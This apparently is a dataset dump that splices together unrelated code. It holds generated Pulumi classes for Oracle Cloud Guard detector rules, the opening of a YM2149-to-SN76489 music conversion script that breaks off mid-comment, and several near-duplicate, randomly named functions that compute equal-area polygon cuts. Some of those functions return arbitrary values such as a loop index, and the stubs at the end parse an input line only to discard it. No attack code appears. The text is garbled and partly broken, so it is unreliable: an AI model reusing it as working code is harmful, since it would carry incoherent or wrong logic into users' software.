input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
def description(self) -> str:
"""
ResponderRule Description
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def detector(self) -> str:
    """
    Detector for the rule.
    """
    return pulumi.get(self, "detector")
@property
@pulumi.getter(name="detectorRecipeId")
def detector_recipe_id(self) -> str:
    """
    Unique identifier for the Detector Recipe of which this is an extension.
    """
    return pulumi.get(self, "detector_recipe_id")
@property
@pulumi.getter(name="detectorRules")
def detector_rules(self) -> Sequence['outputs.GetTargetsTargetCollectionItemTargetDetectorRecipeDetectorRuleResult']:
    """
    List of detector rules for the detector type for recipe - user input.
    """
    return pulumi.get(self, "detector_rules")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> str:
    """
    A filter to return only resources that match the entire display name given.
    """
    return pulumi.get(self, "display_name")
@property
@pulumi.getter(name="effectiveDetectorRules")
def effective_detector_rules(self) -> Sequence['outputs.GetTargetsTargetCollectionItemTargetDetectorRecipeEffectiveDetectorRuleResult']:
    """
    List of effective detector rules for the detector type for recipe, after applying defaults.
    """
    return pulumi.get(self, "effective_detector_rules")
@property
@pulumi.getter
def id(self) -> str:
    """
    Unique identifier of TargetResponderRecipe that is immutable on creation.
    """
    return pulumi.get(self, "id")
@property
@pulumi.getter
def owner(self) -> str:
    """
    Owner of ResponderRecipe.
    """
    return pulumi.get(self, "owner")
@property
@pulumi.getter
def state(self) -> str:
    """
    The field life cycle state. Only one state can be provided. Default value for state is active. If no value is specified state is active.
    """
    return pulumi.get(self, "state")
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> str:
    """
    The date and time the target was created. Format defined by RFC3339.
    """
    return pulumi.get(self, "time_created")
@property
@pulumi.getter(name="timeUpdated")
def time_updated(self) -> str:
    """
    The date and time the target was updated. Format defined by RFC3339.
    """
    return pulumi.get(self, "time_updated")
@pulumi.output_type
class GetTargetsTargetCollectionItemTargetDetectorRecipeDetectorRuleResult(dict):
    """
    A single detector rule of a target detector recipe as returned by the
    GetTargets data source. Read-only output type: values are set once in
    __init__ and exposed through pulumi getters.
    """
    def __init__(__self__, *,
                 description: str,
                 details: 'outputs.GetTargetsTargetCollectionItemTargetDetectorRecipeDetectorRuleDetailsResult',
                 detector: str,
                 detector_rule_id: str,
                 display_name: str,
                 lifecycle_details: str,
                 managed_list_types: Sequence[str],
                 recommendation: str,
                 resource_type: str,
                 service_type: str,
                 state: str,
                 time_created: str,
                 time_updated: str):
        """
        :param str description: ResponderRule Description
        :param 'GetTargetsTargetCollectionItemTargetDetectorRecipeDetectorRuleDetailsArgs' details: Details of ResponderRule.
        :param str detector: detector for the rule
        :param str detector_rule_id: The unique identifier of the detector rule
        :param str display_name: A filter to return only resources that match the entire display name given.
        :param str lifecycle_details: A message describing the current state in more detail. For example, can be used to provide actionable information for a resource in Failed state.
        :param Sequence[str] managed_list_types: List of cloudguard managed list types related to this rule
        :param str recommendation: Recommendation for TargetDetectorRecipeDetectorRule
        :param str resource_type: resource type of the configuration to which the rule is applied
        :param str service_type: service type of the configuration to which the rule is applied
        :param str state: The field life cycle state. Only one state can be provided. Default value for state is active. If no value is specified state is active.
        :param str time_created: The date and time the target was created. Format defined by RFC3339.
        :param str time_updated: The date and time the target was updated. Format defined by RFC3339.
        """
        pulumi.set(__self__, "description", description)
        pulumi.set(__self__, "details", details)
        pulumi.set(__self__, "detector", detector)
        pulumi.set(__self__, "detector_rule_id", detector_rule_id)
        pulumi.set(__self__, "display_name", display_name)
        pulumi.set(__self__, "lifecycle_details", lifecycle_details)
        pulumi.set(__self__, "managed_list_types", managed_list_types)
        pulumi.set(__self__, "recommendation", recommendation)
        pulumi.set(__self__, "resource_type", resource_type)
        pulumi.set(__self__, "service_type", service_type)
        pulumi.set(__self__, "state", state)
        pulumi.set(__self__, "time_created", time_created)
        pulumi.set(__self__, "time_updated", time_updated)
    @property
    @pulumi.getter
    def description(self) -> str:
        """
        ResponderRule Description
        """
        return pulumi.get(self, "description")
    @property
    @pulumi.getter
    def details(self) -> 'outputs.GetTargetsTargetCollectionItemTargetDetectorRecipeDetectorRuleDetailsResult':
        """
        Details of ResponderRule.
        """
        return pulumi.get(self, "details")
    @property
    @pulumi.getter
    def detector(self) -> str:
        """
        detector for the rule
        """
        return pulumi.get(self, "detector")
    @property
    @pulumi.getter(name="detectorRuleId")
    def detector_rule_id(self) -> str:
        """
        The unique identifier of the detector rule
        """
        return pulumi.get(self, "detector_rule_id")
    @property
    @pulumi.getter(name="displayName")
    def display_name(self) -> str:
        """
        A filter to return only resources that match the entire display name given.
        """
        return pulumi.get(self, "display_name")
    @property
    @pulumi.getter(name="lifecycleDetails")
    def lifecycle_details(self) -> str:
        """
        A message describing the current state in more detail. For example, can be used to provide actionable information for a resource in Failed state.
        """
        return pulumi.get(self, "lifecycle_details")
    @property
    @pulumi.getter(name="managedListTypes")
    def managed_list_types(self) -> Sequence[str]:
        """
        List of cloudguard managed list types related to this rule
        """
        return pulumi.get(self, "managed_list_types")
    @property
    @pulumi.getter
    def recommendation(self) -> str:
        """
        Recommendation for TargetDetectorRecipeDetectorRule
        """
        return pulumi.get(self, "recommendation")
    @property
    @pulumi.getter(name="resourceType")
    def resource_type(self) -> str:
        """
        resource type of the configuration to which the rule is applied
        """
        return pulumi.get(self, "resource_type")
    @property
    @pulumi.getter(name="serviceType")
    def service_type(self) -> str:
        """
        service type of the configuration to which the rule is applied
        """
        return pulumi.get(self, "service_type")
    @property
    @pulumi.getter
    def state(self) -> str:
        """
        The field life cycle state. Only one state can be provided. Default value for state is active. If no value is specified state is active.
        """
        return pulumi.get(self, "state")
    @property
    @pulumi.getter(name="timeCreated")
    def time_created(self) -> str:
        """
        The date and time the target was created. Format defined by RFC3339.
        """
        return pulumi.get(self, "time_created")
    @property
    @pulumi.getter(name="timeUpdated")
    def time_updated(self) -> str:
        """
        The date and time the target was updated. Format defined by RFC3339.
        """
        return pulumi.get(self, "time_updated")
@pulumi.output_type
class GetTargetsTargetCollectionItemTargetDetectorRecipeDetectorRuleDetailsResult(dict):
    """
    Detail payload of a detector rule: its condition groups, configurations,
    enablement flags, labels and risk level. Read-only output type.
    """
    def __init__(__self__, *,
                 condition_groups: Sequence['outputs.GetTargetsTargetCollectionItemTargetDetectorRecipeDetectorRuleDetailsConditionGroupResult'],
                 configurations: Sequence['outputs.GetTargetsTargetCollectionItemTargetDetectorRecipeDetectorRuleDetailsConfigurationResult'],
                 is_configuration_allowed: bool,
                 is_enabled: bool,
                 labels: Sequence[str],
                 risk_level: str):
        """
        :param Sequence['GetTargetsTargetCollectionItemTargetDetectorRecipeDetectorRuleDetailsConditionGroupArgs'] condition_groups: Condition group corresponding to each compartment
        :param Sequence['GetTargetsTargetCollectionItemTargetDetectorRecipeDetectorRuleDetailsConfigurationArgs'] configurations: ResponderRule configurations
        :param bool is_configuration_allowed: configuration allowed or not
        :param bool is_enabled: Identifies state for ResponderRule
        :param Sequence[str] labels: user defined labels for a detector rule
        :param str risk_level: The Risk Level
        """
        pulumi.set(__self__, "condition_groups", condition_groups)
        pulumi.set(__self__, "configurations", configurations)
        pulumi.set(__self__, "is_configuration_allowed", is_configuration_allowed)
        pulumi.set(__self__, "is_enabled", is_enabled)
        pulumi.set(__self__, "labels", labels)
        pulumi.set(__self__, "risk_level", risk_level)
    @property
    @pulumi.getter(name="conditionGroups")
    def condition_groups(self) -> Sequence['outputs.GetTargetsTargetCollectionItemTargetDetectorRecipeDetectorRuleDetailsConditionGroupResult']:
        """
        Condition group corresponding to each compartment
        """
        return pulumi.get(self, "condition_groups")
    @property
    @pulumi.getter
    def configurations(self) -> Sequence['outputs.GetTargetsTargetCollectionItemTargetDetectorRecipeDetectorRuleDetailsConfigurationResult']:
        """
        ResponderRule configurations
        """
        return pulumi.get(self, "configurations")
    @property
    @pulumi.getter(name="isConfigurationAllowed")
    def is_configuration_allowed(self) -> bool:
        """
        configuration allowed or not
        """
        return pulumi.get(self, "is_configuration_allowed")
    @property
    @pulumi.getter(name="isEnabled")
    def is_enabled(self) -> bool:
        """
        Identifies state for ResponderRule
        """
        return pulumi.get(self, "is_enabled")
    @property
    @pulumi.getter
    def labels(self) -> Sequence[str]:
        """
        user defined labels for a detector rule
        """
        return pulumi.get(self, "labels")
    @property
    @pulumi.getter(name="riskLevel")
    def risk_level(self) -> str:
        """
        The Risk Level
        """
        return pulumi.get(self, "risk_level")
@pulumi.output_type
class GetTargetsTargetCollectionItemTargetDetectorRecipeDetectorRuleDetailsConditionGroupResult(dict):
    """
    Compartment-scoped condition group attached to a detector rule.
    Read-only output type.
    """
    def __init__(__self__, *,
                 compartment_id: str,
                 condition: str):
        """
        :param str compartment_id: The ID of the compartment in which to list resources.
        :param str condition: Matching condition for this compartment (undocumented in the upstream schema).
        """
        pulumi.set(__self__, "compartment_id", compartment_id)
        pulumi.set(__self__, "condition", condition)
    @property
    @pulumi.getter(name="compartmentId")
    def compartment_id(self) -> str:
        """
        The ID of the compartment in which to list resources.
        """
        return pulumi.get(self, "compartment_id")
    @property
    @pulumi.getter
    def condition(self) -> str:
        # Matching condition for this compartment; the generated schema ships
        # no description here — confirm semantics against the provider docs.
        return pulumi.get(self, "condition")
@pulumi.output_type
class GetTargetsTargetCollectionItemTargetDetectorRecipeDetectorRuleDetailsConfigurationResult(dict):
    """
    One key/value configuration entry of a detector rule, optionally
    carrying a list of structured values. Read-only output type.
    """
    def __init__(__self__, *,
                 config_key: str,
                 data_type: str,
                 name: str,
                 value: str,
                 values: Sequence['outputs.GetTargetsTargetCollectionItemTargetDetectorRecipeDetectorRuleDetailsConfigurationValueResult']):
        """
        :param str config_key: Unique name of the configuration
        :param str data_type: configuration data type
        :param str name: configuration name
        :param str value: configuration value
        :param Sequence['GetTargetsTargetCollectionItemTargetDetectorRecipeDetectorRuleDetailsConfigurationValueArgs'] values: List of configuration values
        """
        pulumi.set(__self__, "config_key", config_key)
        pulumi.set(__self__, "data_type", data_type)
        pulumi.set(__self__, "name", name)
        pulumi.set(__self__, "value", value)
        pulumi.set(__self__, "values", values)
    @property
    @pulumi.getter(name="configKey")
    def config_key(self) -> str:
        """
        Unique name of the configuration
        """
        return pulumi.get(self, "config_key")
    @property
    @pulumi.getter(name="dataType")
    def data_type(self) -> str:
        """
        configuration data type
        """
        return pulumi.get(self, "data_type")
    @property
    @pulumi.getter
    def name(self) -> str:
        """
        configuration name
        """
        return pulumi.get(self, "name")
    @property
    @pulumi.getter
    def value(self) -> str:
        """
        configuration value
        """
        return pulumi.get(self, "value")
    @property
    @pulumi.getter
    def values(self) -> Sequence['outputs.GetTargetsTargetCollectionItemTargetDetectorRecipeDetectorRuleDetailsConfigurationValueResult']:
        """
        List of configuration values
        """
        return pulumi.get(self, "values")
@pulumi.output_type
class GetTargetsTargetCollectionItemTargetDetectorRecipeDetectorRuleDetailsConfigurationValueResult(dict):
    """
    A single structured value of a detector rule configuration entry.
    Read-only output type.
    """
    def __init__(__self__, *,
                 list_type: str,
                 managed_list_type: str,
                 value: str):
        """
        :param str list_type: configuration list item type, either CUSTOM or MANAGED
        :param str managed_list_type: type of the managed list
        :param str value: configuration value
        """
        pulumi.set(__self__, "list_type", list_type)
        pulumi.set(__self__, "managed_list_type", managed_list_type)
        pulumi.set(__self__, "value", value)
    @property
    @pulumi.getter(name="listType")
    def list_type(self) -> str:
        """
        configuration list item type, either CUSTOM or MANAGED
        """
        return pulumi.get(self, "list_type")
    @property
    @pulumi.getter(name="managedListType")
    def managed_list_type(self) -> str:
        """
        type of the managed list
        """
        return pulumi.get(self, "managed_list_type")
    @property
    @pulumi.getter
    def value(self) -> str:
        """
        configuration value
        """
        return pulumi.get(self, "value")
@pulumi.output_type
class GetTargetsTargetCollectionItemTargetDetectorRecipeEffectiveDetectorRuleResult(dict):
def __init__(__self__, *,
description: str,
details: 'outputs.GetTargetsTargetCollectionItemTargetDetectorRecipeEffectiveDetectorRuleDetailsResult',
detector: str,
detector_rule_id: str,
display_name: str,
lifecycle_details: str,
managed_list_types: Sequence[str],
recommendation: str,
resource_type: str,
service_type: str,
state: str,
time_created: str,
time_updated: str):
"""
:param str description: ResponderRule Description
:param 'GetTargetsTargetCollectionItemTargetDetectorRecipeEffectiveDetectorRuleDetailsArgs' details: Details of ResponderRule.
:param str detector: detector for the rule
:param str detector_rule_id: The unique identifier of the detector rule
| |
# Source repository: kieranhj/ym2149f
#!/usr/bin/env python
# ym2sn.py
# .YM files (YM2149 sound chip) to SN76489 .VGM music file format conversion utility
# was originated based on code from https://github.com/FlorentFlament/ym2149-streamer
# Almost completely rewritten by https://github.com/simondotm/
#
# Copyright (c) 2019 <NAME>. All rights reserved.
#
# "MIT License":
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the Software
# is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
# PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import functools
import itertools
import struct
import sys
import time
import binascii
import math
import os
from os.path import basename
PYTHON_VERSION = sys.version_info[0] # returns 2 or >=3
# Command line can override these defaults
SN_CLOCK = 4000000 # set this to the target SN chip clock speed
LFSR_BIT = 15 # set this to either 15 or 16 depending on which bit of the LFSR is tapped in the SN chip
ENABLE_ENVELOPES = True # enable this to simulate envelopes in the output
ENABLE_ATTENUATION = False # enables conversion of YM to SN attenuation. In theory a better matching of volume in the output.
FILTER_CHANNEL_A = False
FILTER_CHANNEL_B = False
FILTER_CHANNEL_C = False
FILTER_CHANNEL_N = False # Noise channel
ENABLE_DEBUG = False # enable this to have ALL the info spitting out. This is more than ENABLE_VERBOSE
ENABLE_VERBOSE = False
ARDUINO_BIN = False
ENABLE_TUNED_NOISE = False # enable this to tune white noise rather than use the nearest fixed frequency white noise
# white noise is generated every counter cycle, so unlike square wave scale is 1.0 rather than 2.0
SN_NOISE_DC = 2.0 # 2.0
# Percussive Noise has a dedicated channel and attenuator on the SN
# whereas on the YM, the noise waveform is logically OR'd with the squarewave
# Therefore each YM channel contributes 1/3 of the overall noise volume
# As a result SN percussion adds 25% extra volume in the mix unless we compensate for it.
# This scaler allows that to be balanced
# This can be tweaked if necessary
NOISE_MIX_SCALE = 1.0 / 3.0
# Runtime options (not command line options)
ENABLE_NOISE = True # enables noises to be processed
ENABLE_NOISE_PITCH = True # enables 'nearest match' fixed white noise frequency selection rather than fixed single frequency
ENABLE_ENVELOPE_MIX_HACK = True # weird oddity fix where tone mix is disabled, but envelopes are enabled - EXPERIMENTAL
OPTIMIZE_VGM = True # outputs delta register updates in the vgm rather than 1:1 register dumps
SAMPLE_RATE = 1 # number of volume frames to process per YM frame (1=50Hz, 2=100Hz, 63=700Hz, 126=6300Hz (GOOD!) 147=7350Hz, 294=14700Hz, 441=22050Hz, 882=44100Hz)
# legacy/non working debug flags
SIM_ENVELOPES = True # set to true to use full volume for envelope controlled sounds
# For testing only
ENABLE_BIN = False # enable output of a test 'bin' file (ie. the raw SN data file)
#--------------------------------------------------------------------
# Bass frequency processing settings
#--------------------------------------------------------------------
# Since the hardware SN76489 chip is limited to a frequency range determined by its clock rate, and also 10-bit precision,
# so some low-end frequencies cannot be reproduced to match the 12-bit precision YM chip.
#
# To remedy this we have two techniques available:
# 1. Use the periodic noise feature of the SN76489 to 'simulate' these lower frequencies (at the cost of interleaving percussion and some approximation because we can only have one channel playing PN)
# 2. Simulate the low-end frequencies in software by implementing a low frequency square wave using software timers to manipulate attenuation on the tone channels
# Periodic noise based bass settings (default)
ENABLE_BASS_TONES = True # enables low frequency tones to be simulated with periodic noise
ENABLE_BASS_BIAS = True # enables bias to the most active bass channel when more than one low frequency tone is playing at once.
FORCE_BASS_CHANNEL = -1 #-1 # set this to 0,1 or 2 (A/B/C) or -1, to make a specific channel always take the bass frequency. Not an elegant or useful approach.
# Software bass settings (overrides periodic noise bass)
# Enabling this setting will create output register data that is not hardware compliant, so any decoder must interpret the data correctly to synthesize bass frequencies.
# The output VGM file is VGM compatible, but it will not sound correct when played due to the data modifications.
#
# The approach is as follows:
# For any frequency on a tone channel that is below the SN76489 hardware tone frequency range (ie. value > 10-bits)
# We divide the tone register value by 4, store that in the 10-bit output, but set bit 6 in the high byte DATA register.
# The decoder must check for this bit being set and interpret the tone register value as the duty cycle time for a software generated squarewave.
ENABLE_SOFTWARE_BASS = False
# Software bass widens the usable tone range to the YM's full 12 bits;
# otherwise we are limited to the SN's native 10-bit tone registers.
if ENABLE_SOFTWARE_BASS:
    TONE_RANGE = 4095
    ENABLE_BASS_TONES = False
else:
    TONE_RANGE = 1023
# R00 = Channel A Pitch LO (8 bits)
# R01 = Channel A Pitch HI (4 bits)
# R02 = Channel B Pitch LO (8 bits)
# R03 = Channel B Pitch HI (4 bits)
# R04 = Channel C Pitch LO (8 bits)
# R05 = Channel C Pitch HI (4 bits)
# R06 = Noise Frequency (5 bits)
# R07 = I/O & Mixer (IOB|IOA|NoiseC|NoiseB|NoiseA|ToneC|ToneB|ToneA)
# R08 = Channel A Level (M | 4 bits) (where M is mode)
# R09 = Channel B Level (M | 4 bits)
# R10 = Channel C Level (M | 4 bits)
# R11 = Envelope Freq LO (8 bits)
# R12 = Envelope Freq HI (8 bits)
# R13 = Envelope Shape (CONT|ATT|ALT|HOLD)
# Chip specs:
# 3 x Squarewave tone oscillators and 1 x Noise generator
# 1 x Envelope driver
# 1 x Mixer
# Pitch oscillation frequency is (Clock / 16 x TP) [TP is tone pitch]
# Noise frequency is (Clock / 16 x NP) [NP is noise pitch R6]
# Noise and/or Tone is output when Mixer flag is set to 0 for a channel
# Mode [M] is 1, then envelope drives volume, when 0, the 4 bit value drives attenuation
# Envelope repetition frequency (fE) is (Clock / 256 x EP) [EP is envelope frequency]
# Envelope shape has 10 valid settings - see data sheet for details
# Envelope Generator
# The envelope generator is a simple 5-bit counter, that can be incremented, decremented, reset or stopped
# Control of its behaviour is via R13
# The output of the counter drives the attenuation of the output signal (in 5 bit precision rather than 4 bit normally)
# The counter increments once every fE/32
# By calculating the envelope frequency we can determine how fast any software simulation of the waveform would need to be
# Writing to register 13 resets the envelope clock
# r13 has a particular status. If the value stored in the file is 0xff, YM emulator will not reset the waveform position.
# To get envelopes working on an SN chip we'd have to simulate the envelopes
# by reprogramming attenuation registers at the correct frequency
# Note that since the SN only has four bits of precision for volume,
# it is already half the required update frequency
# Effects & Digidrums
# Digidrums are 4-bit samples played on one of the 3 voices
# Information for playback is encoded into the spare bits of the YM register data
# Plus 2 'virtual' registers (14+15)
# See ftp://ftp.modland.com/pub/documents/format_documentation/Atari%20ST%20Sound%20Chip%20Emulator%20YM1-6%20(.ay,%20.ym).txt
# r1 free bits are used to code TS:
# r1 bits b5-b4 is a 2bits code wich means:
#
# 00: No TS.
# 01: TS | |
h1
qc = -area_from_left
x = (-qb + (qb ** 2 - 4 * qa * qc) ** 0.5) / (2 * qa)
cuts.append(x1 + x)
if len(cuts) == npieces - 1:
return cuts
segment_remaining -= needed
needed = size
needed -= segment_remaining
return needed
def func_7f0198e143c047f5854e210e55de0ab7(npieces, upper, lower):
    """
    Sweep the region between the *upper* and *lower* polylines left to
    right, recording one trapezoidal segment per polyline vertex, then
    place npieces - 1 vertical cuts of equal area.

    Returns the list of cut x-positions once npieces - 1 cuts are found;
    if the allocation pass completes first, returns the total width W.
    """
    lo_i = up_i = 0
    segments = []  # (x_left, x_right, h_left, h_right, seg_area, running_total)
    running_total = 0
    sweep_x = 0
    left_h = upper[0][1] - lower[0][1]
    W = lower[-1][0]
    # Pass 1: build the trapezoid list and the cumulative area.
    while sweep_x < W:
        lo_next = lower[lo_i + 1]
        up_next = upper[up_i + 1]
        if lo_next[0] == up_next[0]:
            # Both chains have a vertex at the same x: advance both.
            next_x = lo_next[0]
            right_h = up_next[1] - lo_next[1]
            lo_i += 1
            up_i += 1
        elif lo_next[0] < up_next[0]:
            # Lower vertex comes first: interpolate the upper edge.
            next_x = lo_next[0]
            frac = 1.0 * (next_x - upper[up_i][0]) / (up_next[0] - upper[up_i][0])
            y_upper = upper[up_i][1] + frac * (up_next[1] - upper[up_i][1])
            right_h = y_upper - lo_next[1]
            lo_i += 1
        else:
            # Upper vertex comes first: interpolate the lower edge.
            next_x = up_next[0]
            frac = 1.0 * (next_x - lower[lo_i][0]) / (lo_next[0] - lower[lo_i][0])
            y_lower = lower[lo_i][1] + frac * (lo_next[1] - lower[lo_i][1])
            right_h = up_next[1] - y_lower
            up_i += 1
        seg_area = (next_x - sweep_x) * (left_h + right_h) / 2.0
        running_total += seg_area
        segments.append((sweep_x, next_x, left_h, right_h, seg_area, running_total))
        sweep_x = next_x
        left_h = right_h
    piece_area = running_total / npieces
    cuts = []
    needed = piece_area
    # Pass 2: spend each segment's area against the current piece.
    for x1, x2, h1, h2, segment_area, total_area in segments:
        remaining = segment_area
        area_from_left = 0
        while remaining >= needed:
            area_from_left += needed
            width = x2 - x1
            if h1 == h2:
                # Rectangle: cut offset is linear in accumulated area.
                offset = area_from_left / h1
            else:
                # Trapezoid: solve qa*t^2 + qb*t + qc = 0 for the offset t.
                qa = (h2 - h1) / (2 * width)
                qb = h1
                qc = -area_from_left
                offset = (-qb + (qb ** 2 - 4 * qa * qc) ** 0.5) / (2 * qa)
            cuts.append(x1 + offset)
            if len(cuts) == npieces - 1:
                return cuts
            remaining -= needed
            needed = piece_area
        needed -= remaining
    return W
def func_65abc3cbaf334111a1904ca6068f4323(npieces, upper, lower):
    """
    Same equal-area cut computation as its siblings: sweep the region
    between the *upper* and *lower* polylines into trapezoids, then place
    npieces - 1 cuts of equal area.

    Returns the cut positions once npieces - 1 are found; otherwise
    returns the final lower-polyline vertex index from the sweep.
    """
    lo_idx = up_idx = 0
    segments = []  # (x_left, x_right, h_left, h_right, seg_area, running_total)
    running_total = 0
    sweep_x = 0
    left_h = upper[0][1] - lower[0][1]
    W = lower[-1][0]
    # Pass 1: trapezoid decomposition.
    while sweep_x < W:
        lo_next = lower[lo_idx + 1]
        up_next = upper[up_idx + 1]
        if lo_next[0] == up_next[0]:
            # Coincident vertices: advance both chains.
            next_x = lo_next[0]
            right_h = up_next[1] - lo_next[1]
            lo_idx += 1
            up_idx += 1
        elif lo_next[0] < up_next[0]:
            # Lower vertex first: interpolate the upper edge at next_x.
            next_x = lo_next[0]
            frac = 1.0 * (next_x - upper[up_idx][0]) / (up_next[0] - upper[up_idx][0])
            y_upper = upper[up_idx][1] + frac * (up_next[1] - upper[up_idx][1])
            right_h = y_upper - lo_next[1]
            lo_idx += 1
        else:
            # Upper vertex first: interpolate the lower edge at next_x.
            next_x = up_next[0]
            frac = 1.0 * (next_x - lower[lo_idx][0]) / (lo_next[0] - lower[lo_idx][0])
            y_lower = lower[lo_idx][1] + frac * (lo_next[1] - lower[lo_idx][1])
            right_h = up_next[1] - y_lower
            up_idx += 1
        seg_area = (next_x - sweep_x) * (left_h + right_h) / 2.0
        running_total += seg_area
        segments.append((sweep_x, next_x, left_h, right_h, seg_area, running_total))
        sweep_x = next_x
        left_h = right_h
    piece_area = running_total / npieces
    cuts = []
    needed = piece_area
    # Pass 2: allocate equal-area pieces across the segments.
    for x1, x2, h1, h2, segment_area, total_area in segments:
        remaining = segment_area
        area_from_left = 0
        while remaining >= needed:
            area_from_left += needed
            width = x2 - x1
            if h1 == h2:
                offset = area_from_left / h1
            else:
                qa = (h2 - h1) / (2 * width)
                qb = h1
                qc = -area_from_left
                offset = (-qb + (qb ** 2 - 4 * qa * qc) ** 0.5) / (2 * qa)
            cuts.append(x1 + offset)
            if len(cuts) == npieces - 1:
                return cuts
            remaining -= needed
            needed = piece_area
        needed -= remaining
    return lo_idx
def func_72619dff26fd49b1b3f769acede8a49b(npieces, upper, lower):
    """
    Equal-area cut computation over the region between the *upper* and
    *lower* polylines (trapezoid sweep followed by an allocation pass).

    Returns the cut positions once npieces - 1 are found; otherwise
    returns the last accumulated area_from_left value.
    """
    lo_i = up_i = 0
    segments = []  # (x_left, x_right, h_left, h_right, seg_area, running_total)
    running_total = 0
    sweep_x = 0
    left_h = upper[0][1] - lower[0][1]
    W = lower[-1][0]
    # Pass 1: decompose the region into vertical trapezoids.
    while sweep_x < W:
        lo_next = lower[lo_i + 1]
        up_next = upper[up_i + 1]
        if lo_next[0] == up_next[0]:
            # Vertices share the same x: step both chains.
            next_x = lo_next[0]
            right_h = up_next[1] - lo_next[1]
            lo_i += 1
            up_i += 1
        elif lo_next[0] < up_next[0]:
            # Lower vertex first: interpolate y on the upper edge.
            next_x = lo_next[0]
            frac = 1.0 * (next_x - upper[up_i][0]) / (up_next[0] - upper[up_i][0])
            y_upper = upper[up_i][1] + frac * (up_next[1] - upper[up_i][1])
            right_h = y_upper - lo_next[1]
            lo_i += 1
        else:
            # Upper vertex first: interpolate y on the lower edge.
            next_x = up_next[0]
            frac = 1.0 * (next_x - lower[lo_i][0]) / (lo_next[0] - lower[lo_i][0])
            y_lower = lower[lo_i][1] + frac * (lo_next[1] - lower[lo_i][1])
            right_h = up_next[1] - y_lower
            up_i += 1
        seg_area = (next_x - sweep_x) * (left_h + right_h) / 2.0
        running_total += seg_area
        segments.append((sweep_x, next_x, left_h, right_h, seg_area, running_total))
        sweep_x = next_x
        left_h = right_h
    piece_area = running_total / npieces
    cuts = []
    needed = piece_area
    # Pass 2: place a cut every time one piece worth of area accumulates.
    for x1, x2, h1, h2, segment_area, total_area in segments:
        remaining = segment_area
        area_from_left = 0
        while remaining >= needed:
            area_from_left += needed
            width = x2 - x1
            if h1 == h2:
                offset = area_from_left / h1
            else:
                qa = (h2 - h1) / (2 * width)
                qb = h1
                qc = -area_from_left
                offset = (-qb + (qb ** 2 - 4 * qa * qc) ** 0.5) / (2 * qa)
            cuts.append(x1 + offset)
            if len(cuts) == npieces - 1:
                return cuts
            remaining -= needed
            needed = piece_area
        needed -= remaining
    return area_from_left
def func_acc1cf2e160140b1949af7872e98cfc2(npieces, upper, lower):
    """
    Equal-area cut computation over the region between the *upper* and
    *lower* polylines.

    Returns the cut positions once npieces - 1 are found; otherwise
    returns the last value held by x (the final solved cut offset, or the
    final sweep position when no cut was solved).  x is deliberately
    shared between the sweep and the cut solver to preserve that tail
    behaviour.
    """
    lo_i = up_i = 0
    segments = []  # (x_left, x_right, h_left, h_right, seg_area, running_total)
    running_total = 0
    x = 0
    left_h = upper[0][1] - lower[0][1]
    W = lower[-1][0]
    # Pass 1: sweep, emitting one trapezoid per polyline vertex.
    while x < W:
        lo_next = lower[lo_i + 1]
        up_next = upper[up_i + 1]
        if lo_next[0] == up_next[0]:
            # Matching vertex x on both chains.
            next_x = lo_next[0]
            right_h = up_next[1] - lo_next[1]
            lo_i += 1
            up_i += 1
        elif lo_next[0] < up_next[0]:
            # Lower vertex first: interpolate the upper edge.
            next_x = lo_next[0]
            frac = 1.0 * (next_x - upper[up_i][0]) / (up_next[0] - upper[up_i][0])
            y_upper = upper[up_i][1] + frac * (up_next[1] - upper[up_i][1])
            right_h = y_upper - lo_next[1]
            lo_i += 1
        else:
            # Upper vertex first: interpolate the lower edge.
            next_x = up_next[0]
            frac = 1.0 * (next_x - lower[lo_i][0]) / (lo_next[0] - lower[lo_i][0])
            y_lower = lower[lo_i][1] + frac * (lo_next[1] - lower[lo_i][1])
            right_h = up_next[1] - y_lower
            up_i += 1
        seg_area = (next_x - x) * (left_h + right_h) / 2.0
        running_total += seg_area
        segments.append((x, next_x, left_h, right_h, seg_area, running_total))
        x = next_x
        left_h = right_h
    piece_area = running_total / npieces
    cuts = []
    needed = piece_area
    # Pass 2: allocate equal-area pieces, reusing x for the cut offset.
    for x1, x2, h1, h2, segment_area, total_area in segments:
        remaining = segment_area
        area_from_left = 0
        while remaining >= needed:
            area_from_left += needed
            width = x2 - x1
            if h1 == h2:
                x = area_from_left / h1
            else:
                qa = (h2 - h1) / (2 * width)
                qb = h1
                qc = -area_from_left
                x = (-qb + (qb ** 2 - 4 * qa * qc) ** 0.5) / (2 * qa)
            cuts.append(x1 + x)
            if len(cuts) == npieces - 1:
                return cuts
            remaining -= needed
            needed = piece_area
        needed -= remaining
    return x
def func_c2929ae2c19149a88a70128c25e6ca9f(infile):
    """
    Consume the "W L U G" header line of a test case from *infile* and
    return a fresh, empty list for collecting lower-polyline vertices.
    """
    W, L, U, G = [int(tok) for tok in infile.readline().split()]
    return []
def func_3edd52e9c31f4b048aac383659844c00(infile):
    """
    Parse the four-integer "W L U G" case header from *infile* and return
    G, the requested number of equal-area groups.
    """
    W, L, U, G = [int(tok) for tok in infile.readline().split()]
    return G
def func_c207992cf0b54db69e25fb638c2aa8ff(infile):
    """
    Parse the four-integer "W L U G" case header from *infile* and return
    L, the number of lower-polyline vertices.
    """
    W, L, U, G = [int(tok) for tok in infile.readline().split()]
    return L
def func_fdeba186f3d14cc4b2b8f67e2e8b24a9(infile):
    """
    Parse the four-integer "W L U G" case header from *infile* and return
    U, the number of upper-polyline vertices.
    """
    W, L, U, G = [int(tok) for tok in infile.readline().split()]
    return U
